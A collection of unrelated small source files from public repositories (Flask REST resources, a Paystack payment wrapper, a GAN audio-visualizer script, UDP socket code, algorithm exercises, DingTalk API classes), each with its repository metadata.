print(list(students_attendance.items()))
for t in students_attendance.items():
print(t)
#3
people = [("Bob", 42, "Mechanic"), ("James", 24, "Artist"), ("Harry", 32, "Lecturer")]
for name, age, profession in people:
print(f"Name: {name}, Age: {age}, Profession: {profession}")
#4
head, *tail = [1, 2, 3, 4, 5]
print(head)
print(tail)
|
[
"leseditumelo32@gmail.com"
] |
leseditumelo32@gmail.com
|
4538004f106fffe79d316a3c4935178f4a9bc725
|
0517d16821ae92719f0d96d8036cf72effb0cc36
|
/everscript/__init__.py
|
df2fb0f35bd217a79b8a7e8a4cfdb9022415082c
|
[] |
no_license
|
von/everscript
|
07ea72157f993e8c2f538c884806e37e9c7521c9
|
c61dc9f5fed679cedd9dac80718784d23e798dda
|
refs/heads/master
| 2020-04-12T07:37:46.649065
| 2013-02-13T16:23:23
| 2013-02-13T16:23:23
| 2,486,306
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 191
|
py
|
from constants import *
from EverNote import EverNote, EverNoteException
from Note import Note
from Notes import Notes
from Plugin import Plugin
from ToDo import ToDo
from ToDos import ToDos
|
[
"von@vwelch.com"
] |
von@vwelch.com
|
391d6b41347eaed37843d533873b24430cff13dc
|
724afba6b3534620645b0a2f7f91b1b10297458f
|
/code/resources/store.py
|
dc02bf05ba1052dec43559bcdf904348b5670e92
|
[] |
no_license
|
Jaco26/flask-with-flasksqlalchemy
|
94b9dc091ec1a9cc71aec2171ebff6733c6889d3
|
a212408c187cc390874684e7ab5e9ae0e411b617
|
refs/heads/master
| 2020-04-02T20:15:06.248009
| 2018-10-27T19:59:04
| 2018-10-27T19:59:04
| 154,762,670
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 926
|
py
|
from flask_restful import Resource, reqparse
from models.store import StoreModel
class Store(Resource):
def get(self, name):
store = StoreModel.find_by_name(name)
if store:
return store.json() # default HTTP status = 200
return { 'message': 'The store called {} was not found'.format(name) }, 404
def post(self, name):
if StoreModel.find_by_name(name):
return { 'message': 'The store called {} already exists'.format(name) }, 400
store = StoreModel(name)
try:
store.save_to_db()
except:
return { 'message': 'An error occured while creating the store.' }, 500
return store.json(), 201
def delete(self, name):
store = StoreModel.find_by_name(name)
if store:
store.delete_from_db()
return { 'message': 'Store deleted' }
class StoreList(Resource):
def get(self):
return { 'stores': [store.json() for store in StoreModel.query.all()] }
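# A minimal wiring sketch (assumption: the project builds a Flask app and a
# flask_restful Api elsewhere; the names `app` and `api` below are hypothetical):
#
#   from flask import Flask
#   from flask_restful import Api
#   from resources.store import Store, StoreList
#
#   app = Flask(__name__)
#   api = Api(app)
#   api.add_resource(Store, '/store/<string:name>')
#   api.add_resource(StoreList, '/stores')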
|
[
"jacob.albright23@gmail.com"
] |
jacob.albright23@gmail.com
|
c805769e7c7870835953e3cc6f75171540adeca0
|
ec0b8c74ae4f370e47aa1a19adfa654b2766a19f
|
/src/run_ganterpreter.py
|
33af7402ef8571b199b84fc01cc96fab9861c32e
|
[
"Apache-2.0"
] |
permissive
|
psc-g/ganterpretation
|
e8c37ce4a5ddd81c5f933a667ffef0696b56773b
|
98a963d098e0cf5a49dced1300840388001eeddf
|
refs/heads/master
| 2021-07-14T02:27:20.704844
| 2020-11-30T21:12:45
| 2020-11-30T21:12:45
| 218,511,004
| 22
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,679
|
py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import app
from absl import flags
import ganterpreter
flags.DEFINE_string('output_dir', None, 'Directory where to store output.')
flags.DEFINE_string('wav_path', None, 'Path to wav file to use.')
flags.DEFINE_string('video_file_name', None,
'Name of video file, defaults to "video.avi"')
flags.DEFINE_string('model_type', 'biggan-512',
'BigGAN model type to load (biggan-{128, 256, 512})')
flags.DEFINE_list('selected_categories', [],
'Manually specified categories to use for interpolation. '
'Missing categories will be assigned randomly.')
flags.DEFINE_float('inflection_threshold', 0.035,
'Threshold on FFT TotalVariation changes to set '
'inflection points.')
flags.DEFINE_bool('verbose', False, 'Whether to print verbose messages.')
FLAGS = flags.FLAGS
def main(unused_argv):
"""Main method."""
selected_categories = [int(x) for x in FLAGS.selected_categories]
gandy = ganterpreter.GANterpreter(
model_type=FLAGS.model_type,
selected_categories=selected_categories,
verbose=FLAGS.verbose)
gandy.load_wav_file(FLAGS.wav_path, verbose=FLAGS.verbose)
gandy.compute_spectrogram(inflection_threshold=FLAGS.inflection_threshold,
verbose=FLAGS.verbose)
gandy.fill_selected_categories()
gandy.generate_video(FLAGS.output_dir,
video_file_name=FLAGS.video_file_name)
if __name__ == '__main__':
# flags.mark_flag_as_required('base_dir')
app.run(main)
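# Example invocation (a sketch based only on the flags defined above; the paths
# are placeholders, not files shipped with the repository):
#
#   python run_ganterpreter.py \
#     --wav_path=/path/to/audio.wav \
#     --output_dir=/tmp/ganterpretation \
#     --model_type=biggan-512 \
#     --selected_categories=1,100,530 \
#     --inflection_threshold=0.035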
|
[
"psc@google.com"
] |
psc@google.com
|
38355cde10cce1c38b527f4881ae08e583000a80
|
978b3484a069de59033bfa21ae4ea9db033c4b7c
|
/djpaystack/transaction.py
|
2133e2de97046b7200787420e4fb45cf8d2292af
|
[] |
no_license
|
boiyelove/hookup
|
3b83223bf8c9a3b407a0c2f3d4f3496de01fcbee
|
59d44ce353d9f4f079e31b904da59e8185a8f401
|
refs/heads/master
| 2023-03-20T20:38:18.233708
| 2021-03-16T13:08:02
| 2021-03-16T13:08:02
| 140,166,924
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,634
|
py
|
from .base import Base
from .settings import TRANSACTIONURL
class Transactions(Base):
def __init__(self):
super(Transactions, self).__init__()
self.baseurl = TRANSACTIONURL
def initialize(self, reference='', amount=0, email=''):
'''
PAYSTACK TRANSACTION API
Initialize Transaction
curl https://api.paystack.co/transaction/initialize \
-H "Authorization: Bearer SECRET_KEY" \
-H "Content-Type: application/json" \
-d '{"reference": "7PVGX8MEk85tgeEpVDtD", "amount": 500000, "email": "customer@email.com"}' \
-X POST
'''
raise NotImplementedError('You have not done this yet')
def charge_auth(self, auth_code='', email='', amount=0):
'''
Charge Authorization
curl https://api.paystack.co/transaction/charge_authorization \
-H "Authorization: Bearer SECRET_KEY" \
-H "Content-Type: application/json" \
-d '{"authorization_code": "AUTH_72btv547", "email": "bojack@horsinaround.com", "amount": 500000}' \
-X POST
'''
raise NotImplementedError('You have not done this yet')
def re_auth(self):
'''
Request Reauthorization
curl https://api.paystack.co/transaction/request_reauthorization \
-H "Authorization: Bearer SECRET_KEY" \
-H "Content-Type: application/json" \
-d '{"authorization_code": "AUTH_72btv547", "email": "bojack@horsinaround.com", "amount": 500000}' \
-X POST
'''
return ''
def check_auth(self, auth_code='', email='', amount=0):
'''
Check Authorization
curl https://api.paystack.co/transaction/check_authorization \
-H "Authorization: Bearer SECRET_KEY" \
-H "Content-Type: application/json" \
-d '{"authorization_code": "AUTH_72btv547", "email": "bojack@horsinaround.com", "amount": 500000}' \
-X POST
'''
return ''
def verify(self, reference_code):
'''
Verify transaction
curl https://api.paystack.co/transaction/verify/DG4uishudoq90LD \
-H "Authorization: Bearer SECRET_KEY"
'''
return self.execute(endpoint = ('/verify/' + reference_code))
def verify_by_customer(self, plan_code=None, reference_code=None, email=None, customer_id=None, customer_code=None):
data = self.verify(reference_code)
if customer_id: ver_measure = customer_id
elif customer_code: ver_measure = customer_code
elif email: ver_measure = email
else:
raise TypeError('email or customer_detail cannot be null')
# if (plan_code == data['plan'] ) and (email== data['customer']['email']) : pass
cus = data['customer']
auth = data['authorization']
plan = data['plan']
if ((cus['email'] == email) and (data['plan'] == plan_code)):
return True
return False
def get_auth(self):
return self.payload['authorization']
def get_customer(self):
return self.payload['authorization']
def get_plan(self):
return self.payload['plan']
def fetch(self, id=0):
'''
Fetch Transaction
curl "https://api.paystack.co/transaction/2091" \
-H "Authorization: Bearer SECRET_KEY"
-X GET
'''
return ''
def timeline(self, id=0):
'''
View transaction Timeline
curl https://api.paystack.co/transaction/timeline/21002R319U5139 \
-H "Authorization: Bearer SECRET_KEY"
'''
return ''
def totals(self, user=None):
'''
Transaction Totals
curl "https://api.paystack.co/transaction/totals" \
-H "Authorization: Bearer SECRET_KEY"
-X GET
'''
return ''
def user_totals(self, customer_id):
self.data = {'customer': customer_id, 'status': 'success'}
self.execute()
rmeta = self.payload['meta']
# f = open('data.json', 'w+')
# f.write(str(self.payload))
# f.close()
print(self.payload)
amount = 0
# for item in self.payload['data']:
# amount += item['amount']
return rmeta["total_volume"]
# return amount
def export(self):
'''
Export Transaction
curl "https://api.paystack.co/transaction/export" \
-H "Authorization: Bearer SECRET_KEY"
-X GET
'''
return ''
def verify_transaction(self, ref_code='', email='', plan_code=''):
transaction_url = 'https://api.paystack.co/transaction/verify/'
if ref_code == '':
raise ValueError('please provide a referece code')
transaction_url += ref_code
r = self.requests.get(transaction_url, headers=self.header)
r = r.json()
print(r)
if r['status']:
data = r['data']
cus = data['customer']
auth = data['authorization']
plan = data['plan']
print(cus['email'],email,data['plan'], plan_code)
print(type(cus['email']),type(email),type(data['plan']), type(plan_code))
print('True0 True0')
if ((cus['email'] == email) and (data['plan'] == plan_code)):
print('True')
return True
print('False')
return False
|
[
"daahrmmieboiye@gmail.com"
] |
daahrmmieboiye@gmail.com
|
e10440c3b022311e7e3f8255e41e920a81620a1b
|
c6d84655a8424c8ade139fd79ae1bbb1514f8c88
|
/05socket/udp_producer.py
|
c8f3cd16854e8e3a5104c25dece2780513a69411
|
[] |
no_license
|
eryeer/pythonStudy
|
64240934ce463e7e9714fc7f0d7a6608cefab837
|
5c6a69ef10c0df38f89aee7e5d5cc9802a2b424b
|
refs/heads/master
| 2020-04-08T15:16:19.579466
| 2019-04-15T06:13:41
| 2019-04-15T06:13:41
| 159,472,137
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 536
|
py
|
import socket
def test(a: str, b: int) -> int:
print(a)
print(b)
return b
def main():
# test("1", 2)
udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_socket.bind(("", 7890))
# udp_socket.sendto(b"hahaha", ("localhost", 8080))
while True:
send_data = input("input send message")
if send_data == "exit":
udp_socket.close()
return
udp_socket.sendto(send_data.encode("utf-8"), ("localhost", 8080))
if __name__ == '__main__':
main()
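# A minimal receiving counterpart for local testing (an illustrative assumption;
# the repository's actual consumer script is not shown in this file):
#
#   import socket
#   udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#   udp_socket.bind(("localhost", 8080))
#   while True:
#       data, addr = udp_socket.recvfrom(1024)
#       print(addr, data.decode("utf-8"))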
|
[
"eryeer@163.com"
] |
eryeer@163.com
|
a9642d6c74ccc57e476b12e9fcc18c36bc7a0d0f
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02913/s870183594.py
|
9f40aaa7f32fff9e55ca4ec7a16c32dad0b4c50a
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 479
|
py
|
M = int(input())
T = input()
ans = 0
for l in range(M):
i, j = 1, 0
S = T[l:]
N = M-l
Z = [0]*N
Z[0] = N
while i < N:
while i+j < N and S[j] == S[i+j]:
j += 1
Z[i] = j
if j == 0:
i += 1
continue
k = 1
while i+k < N and k+Z[k] < j:
Z[i+k] = Z[k]
k += 1
i += k
j -= k
for i in range(N):
ans = max(ans, min(i, Z[i]))
print(ans)
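# Explanatory note: for each starting offset l, the loop above computes the
# Z-array of the suffix S = T[l:], where Z[i] is the length of the longest
# common prefix of S and S[i:]. Taking min(i, Z[i]) caps a match so the two
# occurrences cannot overlap, so `ans` is the length of the longest substring
# that appears at least twice in T without overlapping.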
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
f845ef1a170fda7ca4deb266135c6e317c07867c
|
f61ab4deaa5e5bd5171bb28854eaa6eacdc95a4c
|
/Instuiteapp/apps.py
|
7d961d172cbea670f828f552d7a799f9eb80e6de
|
[] |
no_license
|
Adi19471/Institute_djangomvtadi_DJANGO
|
dfd67237bc4ca129f84fa62f15bcc17b1d4585ea
|
f4ce3f1c58a7e152d6011583d287be577f967cce
|
refs/heads/master
| 2023-07-22T17:03:59.781683
| 2021-09-11T07:25:45
| 2021-09-11T07:25:45
| 403,988,727
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 154
|
py
|
from django.apps import AppConfig
class InstuiteappConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'Instuiteapp'
|
[
"akumatha@gmail.com"
] |
akumatha@gmail.com
|
c5416e6dd1cf97f29485ef6dcc297e53adb103b7
|
a2b6bc9bdd2bdbe5871edb613065dd2397175cb3
|
/算法小抄/打家劫舍/打家劫舍2.py
|
86f4e208511f26cebd8d468f2cb207d132ffe41b
|
[] |
no_license
|
Asunqingwen/LeetCode
|
ed8d2043a31f86e9e256123439388d7d223269be
|
b7c59c826bcd17cb1333571eb9f13f5c2b89b4ee
|
refs/heads/master
| 2022-09-26T01:46:59.790316
| 2022-09-01T08:20:37
| 2022-09-01T08:20:37
| 95,668,066
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,410
|
py
|
"""
你是一个专业的小偷,计划偷窃沿街的房屋,每间房内都藏有一定的现金。这个地方所有的房屋都围成一圈,这意味着第一个房屋和最后一个房屋是紧挨着的。同时,相邻的房屋装有相互连通的防盗系统,如果两间相邻的房屋在同一晚上被小偷闯入,系统会自动报警。
给定一个代表每个房屋存放金额的非负整数数组,计算你在不触动警报装置的情况下,能够偷窃到的最高金额。
示例 1:
输入: [2,3,2]
输出: 3
解释: 你不能先偷窃 1 号房屋(金额 = 2),然后偷窃 3 号房屋(金额 = 2), 因为他们是相邻的。
示例 2:
输入: [1,2,3,1]
输出: 4
解释: 你可以先偷窃 1 号房屋(金额 = 1),然后偷窃 3 号房屋(金额 = 3)。
偷窃到的最高金额 = 1 + 3 = 4 。
"""
from typing import List
class Solution:
def rob(self, nums: List[int]) -> int:
def robRange(start, end) -> int:
dp1, dp2 = 0, 0
for i in range(end, start - 1, -1):
dp2, dp1 = dp1, max(dp1, dp2 + nums[i])
return dp1
length = len(nums)
if length == 1:
return nums[0]
return max(robRange(0, length - 2), robRange(1, length - 1))
if __name__ == '__main__':
nums = [2, 3, 2]
sol = Solution()
result = sol.rob(nums)
print(result)
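# Note on the approach: because the houses form a circle, house 0 and house n-1
# can never both be robbed. The solution therefore runs the ordinary linear
# "house robber" DP (robRange) twice -- once on houses [0, n-2] and once on
# houses [1, n-1] -- and returns the larger result.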
|
[
"sqw123az@sina.com"
] |
sqw123az@sina.com
|
2b258251be54698c7cf7f09390b9b22df7e3c439
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_089/ch151_2020_04_13_20_49_15_933281.py
|
d9c04612c3fb56edfc9d41e6d501ee71b350565e
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 469
|
py
|
def classifica_lista(x):
    # Classifies a list as "crescente" (increasing), "decrescente" (decreasing) or "nenhum" (neither).
    resultado = []
    if x == [] or len(x) < 2:
        return "nenhum"
    i = 0
    while i < len(x) - 1:   # stop before the last index to avoid an IndexError
        if x[i] > x[i+1]:
            resultado.append('d')
        elif x[i] < x[i+1]:
            resultado.append('c')
        i += 1              # always advance, so equal neighbours cannot cause an infinite loop
    if "d" in resultado and "c" in resultado:
        return "nenhum"
    if "d" not in resultado:
        return "crescente"
    if "c" not in resultado:
        return "decrescente"
|
[
"you@example.com"
] |
you@example.com
|
99252c919df613b170478deccf524a3f1ddbee2c
|
3d62a14eb69baea0737f8c093336cbf6380b30a7
|
/dingtalk/api/rest/OapiEduSubDataGetRequest.py
|
99501c9ebbb090accf9eaf4d2e957ecccaccf64e
|
[] |
no_license
|
KangSpace/message_plus_server
|
50cbc55c296d5e835a0c6f99f45cf699f6806add
|
300954993f44648db3a2124d587533656d970d6c
|
refs/heads/main
| 2023-05-01T15:08:18.195400
| 2021-05-27T04:41:56
| 2021-05-27T04:41:56
| 361,338,925
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 398
|
py
|
'''
Created by auto_sdk on 2021.01.29
'''
from dingtalk.api.base import RestApi
class OapiEduSubDataGetRequest(RestApi):
def __init__(self,url=None):
RestApi.__init__(self,url)
self.orders = None
self.page_num = None
self.page_size = None
self.stat_date = None
def getHttpMethod(self):
return 'POST'
def getapiname(self):
return 'dingtalk.oapi.edu.sub.data.get'
|
[
"kango2gler@gmail.com"
] |
kango2gler@gmail.com
|